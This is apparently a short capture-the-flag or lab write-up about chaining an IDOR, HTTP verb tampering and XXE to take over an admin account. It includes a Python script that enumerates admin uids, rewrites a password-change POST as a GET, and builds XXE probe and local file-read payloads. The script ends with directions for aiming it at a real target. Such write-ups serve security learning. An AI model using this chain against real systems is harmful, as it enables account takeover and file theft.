☑️SA
Key takeaway: whenever there is a web portal, there is most likely an admin portal (or at least an admin-level account) as well.
Just like here: when we were able to read user details through the IDOR vulnerability, each record came back with a username, uid and company name. The company name for the admin user was Administrator (which I thought was a bit stupid; it took me longer to find it). So next time, just write a script that iterates through all possible uids and uses a case-insensitive regex to flag strings like admin, Admin or Administrator in any field, not only the username.
Once we had the admin user's uid, the next step was to use the same IDOR to change that user's password.
This wasn't possible at first because the POST request we sent had protection against unauthorized data modification. So all we had to do was change it to GET (HTTP verb tampering in action). It will say 'parameter not found' if we don't pass the parameters we had with POST, so they have to move into the query string. Burp has an option to change the request method that moves the parameters for us, which makes it easy. And voilà!
Once we had admin access, we found a web request with an XML body. And boom, XXE. I started by testing whether the vulnerability exists (does the response show the company name we defined in an entity, or does it just spit out the literal &company;). Turns out it was vulnerable and the rest is ez pz.
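The three steps above (enumerate users through the IDOR, reissue the password change as GET, probe the XML endpoint) as one script. This is an added example, not code from the write-up or the target box: the endpoint path, the form parameter names, the XML element names and the user records are all assumptions, and a fake fetcher plus a simulated XML parser stand in for the real HTTP requests so the script runs offline.

```python
import re
from urllib.parse import urlencode
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

# Constructed stand-in for the IDOR endpoint (e.g. GET /api/user/<uid>);
# field names and values are assumed, not taken from the box.
FAKE_USERS = {
    1: {"username": "jdoe", "uid": 1, "company": "Acme Ltd"},
    2: {"username": "mwhite", "uid": 2, "company": "Globex"},
    3: {"username": "htb-stdnt", "uid": 3, "company": "Administrator"},
}

ADMIN_RE = re.compile(r"admin", re.IGNORECASE)  # admin, Admin, Administrator


def fake_fetch(uid):
    """Pretend HTTP call: returns the user record, or None for a missing uid."""
    return FAKE_USERS.get(uid)


def find_admin_users(fetch, uids):
    """Step 1: iterate uids through the IDOR endpoint and keep every record in
    which any string field (not just the username) matches ADMIN_RE."""
    hits = []
    for uid in uids:
        rec = fetch(uid)
        if rec and any(isinstance(v, str) and ADMIN_RE.search(v) for v in rec.values()):
            hits.append(rec)
    return hits


def post_to_get(path, form_params):
    """Step 2: HTTP verb tampering. Move the POST body parameters into the query
    string so the same handler sees them on a GET (what Burp's 'Change request
    method' does). Leaving them out gives the 'parameter not found' response."""
    return f"GET {path}?{urlencode(form_params)} HTTP/1.1"


def xxe_probe(marker):
    """Step 3a: XML body with an internal entity in the company field. A parser
    that expands entities reflects `marker`; one that does not reflects the
    literal '&company;'. Element names are assumed."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY company "{escape(marker)}">]>\n'
        "<root><username>probe</username><company>&company;</company></root>"
    )


def xxe_file_read(path):
    """Step 3b: once expansion is confirmed, swap the internal entity for an
    external SYSTEM entity to read a local file."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY company SYSTEM "file://{path}">]>\n'
        "<root><username>probe</username><company>&company;</company></root>"
    )


def simulated_vulnerable_server(xml_body):
    """Constructed target: parses the body and echoes the company name back.
    Python's expat expands internal entities, so the probe lands."""
    root = ET.fromstring(xml_body)
    return f"Welcome, company {root.findtext('company')}"


def xxe_confirmed(response_text, marker):
    """True when the reflected value is the expanded marker, not the literal."""
    return marker in response_text and "&company;" not in response_text


if __name__ == "__main__":
    admins = find_admin_users(fake_fetch, range(1, 10))
    print(admins)
    print(post_to_get("/api/password/change",
                      {"uid": admins[0]["uid"], "password": "p@ss1"}))
    marker = "XXE-PROBE-7f3a"
    print(xxe_confirmed(simulated_vulnerable_server(xxe_probe(marker)), marker))
```

Against a real target, replace `fake_fetch` with a function that performs the IDOR request and returns the parsed JSON, and send the string from `post_to_get` (or the equivalent Burp Repeater request) instead of printing it; the probe/confirm pair is worth keeping so that the file-read payload is only sent once entity expansion is known to work.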
Allons-y!!!